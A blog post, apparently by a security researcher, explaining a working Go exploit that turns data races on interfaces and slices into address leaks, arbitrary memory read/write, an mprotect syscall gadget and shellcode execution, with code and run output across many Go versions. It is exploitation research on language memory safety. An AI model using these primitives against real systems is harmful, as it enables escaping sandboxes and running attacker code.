These factors made the challenge easier for a CTF: the fmt package gives a nice leak with %p, no pie and fixed Go version 1.13.3 allows to hardcode addresses and behave deterministically with code layout, heap, compiler optimizations and calling convention.
Is it possible to achieve arbitrary code execution on any Go version, even with PIE, and with no package import at all, just builtins? Yes! It's been sitting in my exploits folder for long enough that it's time to write about it.
Data races and exploit primitives
As discussed before, Go's current implementation of interfaces and slices as multiword values gives us the ability to race them:- interface race gives us a type confusion, which we can use to confuse an interface with a struct of 2 uints to leak its internal representation of type + pointer, giving us an addrOf primitive to replace our fmt.Sprintf("%p")
- slice race gives us the ability to write out of bounds, which we can use to build an arbitrary slice (data, length and capacity), giving us an arbitrary read/write primitive
Interface race
The building block of our interface race will be to race 2 structs matching this interface:type racerValue interface { Value() uint64 }We then define structs matching this interface. The first struct will simply hold whatever we want to leak, as an interface so internally represented as a type and a pointer to the data:
type holdInterface struct { i interface{} } func (s holdInterface) Value() uint64 { return 0 }The second struct will be to leak the address of the interface data pointer, so we overlay the interface representation of type + pointer:
type holdInterfaceAddress struct { typ uint64 addr uint64 } func (s holdInterfaceAddress) Value() uint64 { return s.addr }The third struct will be to leak the value behind the address of the interface data pointer, simply by defining it as a pointer and dereferencing it. We could go on like this but we don't need more.
type holdInterfaceValue struct { typ uint64 addr *uint64 } func (s holdInterfaceValue) Value() uint64 { if s.addr != nil { return *s.addr } return 0 }The interface race gives us a type confusion where the data is the first struct (what we want to leak) but the type points to the second or third struct depending what we want to read (address or value).
Then the race is roughly:
func raceLeak(data, leak racerValue) uint64 { confused := value done := false go func() { for { confused = data confused = leak if done { return } } }() for { if v := confused.Value(); v > 0 { done = true return v } } }
Avoiding compiler optimizations
There's a problem with the previous code: over the years, the Go compiler became smarter to eliminate useless code, such as our data race flipping one variable between two values:for { confused = data confused = leak }The compiler realizes it's useless and eliminates the whole loop (disassemble binary to see).
I had to change my approach from time to time, as of Go 1.18 (and all version before) this works:
dontOptimize := confused for { confused = data // this call makes the compiler think confused is being used, // so it doesn't optimize away the loop func() { dontOptimize = confused }() confused = leak } _ = dontOptimize // otherwise compiler complains about unused variable
First primitive: addrOf
We now have enough to build our first addrOf primitives:func addrOf(x interface{}) uint64 { return raceLeak(&holdInterface{x}, &holdInterfaceAddress{}) } func addrOfValue(x interface{}) uint64 { return raceLeak(&holdInterface{x}, &holdInterfaceValue{}) }And from there, we can look at exploiting the slice race to build our arbitrary read/write primitive.
Slice race
To exploit the race reliably across Go versions, we need:- an attacking slice: we will race between this one and a longer slice, aiming to be in a situation where the data points to the attacker slice but the length is still of the long slice, so we can reach out of bounds of the attacking slice.
- a victim slice somewhere after: we will overwrite its data pointer, length and capacity
attacker := make([]uint64, 1)then to hold the victim slice inside of a struct, and lay out a long contiguous slice of victim slices, making it a large allocation, so most likely somewhere after our previous allocation:
type victimSlice struct { s []byte } targets := make([]victimSlice, 4096)Then we just have to aim at the first element: targets[0].s.
To do that, we need to build a slice with a length long enough enough to reach it. We use the interface race to read the address of the attacker and targets slices, then we just calculate the difference (if it's ever negative it means our allocation strategy didn't work and our victim got allocated before).
targetsAddr := addrOfValue(targets) attackerAddr := addrOfValue(attacker) diff := int64(targetsAddr - attackerAddr) if diff < 0 { panic("attacker after target") }The out of bounds index from the attacker slice to reach our victim (targets[0].s) is therefore diff/sizeof(uint64), and counting the size of the attacker slice itself (a slice is 3x uint64: data, length, capacity), the long slice length needs to be at least diff/8+3.
idx := diff / 8 long := make([]uint64, diff/8+3)Then the race is roughly:
func sliceAt(addr, length uint64) []byte { [...] allocate attacker, targets, long, calculate idx confused := attacker go func() { for { confused = long confused = attacker if targets[0].s != nil { return } } }() for { func() { defer func() { recover() }() // confused points to attacker but still len/cap of long confused[idx] = addr confused[idx+1] = length // len confused[idx+2] = length // cap }() if targets[0].s != nil { return targets[0].s } } }
Second primitive: arbitrary read/write
We can create an arbitrary slice, we can't make it start at 0 (nil slice, unusable) but we can start it at 1 and the address is just off by one, and if we set the length to 2^64-1 then we can address the entire memory:func arbitraryRW() memory { return sliceAt(1, 0xffffffffffffffff) } type memory []byte func (m memory) read(addr uint64) byte { return m[addr-1] } func (m memory) write(addr uint64, value byte) { m[addr-1] = value }We can extend it with helper functions like write8(addr, value uint64) and index(from, max uint64, what []byte) uint64 to find a sequence of bytes. Omitted here for brevity, see full exploit at the end.
Code execution
Instead of directly calling execve, let's aim for shellcode execution. We can store the shellcode as a constant but it will not be executable, so first we need to call mprotect to set the shellcode page as executable.We can store a few executable bytes inside immediates (bring our own gadget) and use the arbitrary read/write to find its address. But how do we jump to it? And we want this to be portable across all Go versions and even if built with PIE. Go's calling convention used to be all arguments on the stack but since Go 1.18 it uses registers. That's ok we can use enough arguments until it puts the rest on the stack and as long as it doesn't overlap we're good in both cases.
Here's what we can do:
- we'll set up a short gadget reading arguments from the stack and executing syscall then returning, 8 bytes so it fits a uint64 immediate:
5f ; pop rdi # it's a call so first is saved rip 5f ; pop rdi # addr 5e ; pop rsi # len 5a ; pop rdx # prot 58 ; pop rax # sys_mprotect 0f05 ; syscall c3 ; ret
- we use a function variable (i.e. a function pointer), get its address, write to it to change its destination to the gadget, then call it
- we'll lay out the arguments to be compatible with Go before and after 1.18
m := arbitraryRW() mainAddr := addrOfValue(main) shellcodeAddr := m.index(mainAddr, 0x100000, []byte(shellcode[:8])) find := func(v uint64) uint64 { return m.index(mainAddr, 0x1000, p64s(v)) } var call func(uint64, uint64, uint64, uint64, uint64, uint64, uint64, uint64, uint64, uint64, uint64, uint64, uint64, uint64) callAddr := addrOf(&call) // pop rdi; pop rdi; pop rsi; pop rdx; pop rax; syscall; ret // pop twice rdi because first will be saved rip from the call gadget := find(0xc3050f585a5e5f5f) gadgetAddr := addrOf(&gadget) m.write8(callAddr, gadgetAddr) addr := shellcodeAddr & ^(PAGE_SIZE - 1) const len = PAGE_SIZE * 2 const PROT_READ = 4 const PROT_WRITE = 2 const PROT_EXEC = 1 const prot = PROT_READ | PROT_WRITE | PROT_EXEC const sys_mprotect = 10 call( // Go < 1.18 calling convention is the stack addr, // rdi len, // rsi prot, // rdx sys_mprotect, // rax shellcodeAddr, // ret 0, 1, 2, 3, // unused // Go >= 1.18 calling convention uses registers, then stack // luckily for us this does not overlap so we can prepare both addr, // rdi len, // rsi prot, // rdx sys_mprotect, // rax shellcodeAddr, // ret )
Compatibility
It works on current tip (Go 1.18), regardless of PIE:$ go version go version devel go1.18-6178d25fc0 Wed Dec 29 20:20:32 2021 +0000 linux/amd64 $ go run exploit.go uid=1000(user) gid=1000(user) groups=1000(user) $ go run -buildmode=pie exploit.go uid=1000(user) gid=1000(user) groups=1000(user)As well as old versions:
$ for v in 1.{17..8} 1.7.6 1.6.4 1.5.4; do go install golang.org/dl/go${v}@latest >/dev/null 2>&1 || continue go$v download >/dev/null 2>&1 go$v version go$v run exploit.go done go version go1.17 linux/amd64 uid=1000(user) gid=1000(user) groups=1000(user) go version go1.16 linux/amd64 uid=1000(user) gid=1000(user) groups=1000(user) go version go1.15 linux/amd64 uid=1000(user) gid=1000(user) groups=1000(user) go version go1.14 linux/amd64 uid=1000(user) gid=1000(user) groups=1000(user) go version go1.13 linux/amd64 uid=1000(user) gid=1000(user) groups=1000(user) go version go1.12 linux/amd64 uid=1000(user) gid=1000(user) groups=1000(user) go version go1.11 linux/amd64 uid=1000(user) gid=1000(user) groups=1000(user) go version go1.10 linux/amd64 uid=1000(user) gid=1000(user) groups=1000(user) go version go1.9 linux/amd64 uid=1000(user) gid=1000(user) groups=1000(user) go version go1.8 linux/amd64 uid=1000(user) gid=1000(user) groups=1000(user) go version go1.7.6 linux/amd64 uid=1000(user) gid=1000(user) groups=1000(user) go version go1.6.4 linux/amd64 uid=1000(user) gid=1000(user) groups=1000(user) go version go1.5.4 linux/amd64 uid=1000(user) gid=1000(user) groups=1000(user)To test further back we have to compile from source, and also set GOMAXPROCS=2 as the default was 1 before go1.5:
$ ( git clone -b release-branch.go1.4 --depth 1 https://go.googlesource.com/go go1.4 cd go1.4/src ./make.bash ) $ go1.4/bin/go version go version go1.4-bootstrap-20170531 linux/amd64 $ GOMAXPROCS=2 go1.4/bin/go run exploit.go uid=1000(user) gid=1000(user) groups=1000(user)
From there, building from a modern system requires small tweaks: $ ( git clone -b release-branch.go1.3 --depth 1 https://go.googlesource.com/go go1.3 cd go1.3/src CGO_ENABLED=0 CFLAGS='-Wno-implicit-fallthrough -Wno-shift-negative-value' ./make.bash ) $ go1.3/bin/go version go version go1.3.3 linux/amd64 $ GOMAXPROCS=2 go1.3/bin/go run exploit.go uid=1000(user) gid=1000(user) groups=1000(user)
$ ( git clone -b release-branch.go1.2 --depth 1 https://go.googlesource.com/go go1.2 cd go1.2/src sed -i 's/-Werror//' make.bash sed -i 's/"-Werror",//' cmd/dist/build.c CGO_ENABLED=0 ./make.bash ) $ go1.2/bin/go version go version go1.2.2 linux/amd64 $ GOMAXPROCS=2 go1.2/bin/go run exploit.go uid=1000(user) gid=1000(user) groups=1000(user)
$ ( git clone -b release-branch.go1.1 --depth 1 https://go.googlesource.com/go go1.1 cd go1.1/src sed -i 's/-Werror//' make.bash sed -i 's/"-Werror",//' cmd/dist/build.c CGO_ENABLED=0 ./make.bash ) $ go1.1/bin/go version go version go1.1.2 linux/amd64 $ GOMAXPROCS=2 go1.1/bin/go run exploit.go uid=1000(user) gid=1000(user) groups=1000(user)Unfortunately I couldn't get go1 to compile on my system (I'm getting a weird fault), but it probably works as well.
Full exploit
On github: https://github.com/StalkR/misc/blob/master/go/gomium/exploit.goIn total, the exploit uses 6 data races:
- read attacker slice address
- read victim slice address
- write slice out of bounds
- read address of main
- read address of function pointer
- read address of gadget
Conclusion
As said before, while a fun exercise it's pretty useless in the current Go threat model. Anything accepting arbitrary Go code and running it should be sandboxed.However, if we imagine organizing Go packages by what they do (imports) and enforcing some guarantees around that (think manifests), such exploit could be a way around it. And because of that, there are people looking into making these data races non exploitable, e.g. by boxing the data structures, storing them elsewhere and only atomically moving a single pointer to it, but it comes with a perf impact. Maybe we'll see it in a future Go version. Until then, happy new year :)
No comments:
Post a Comment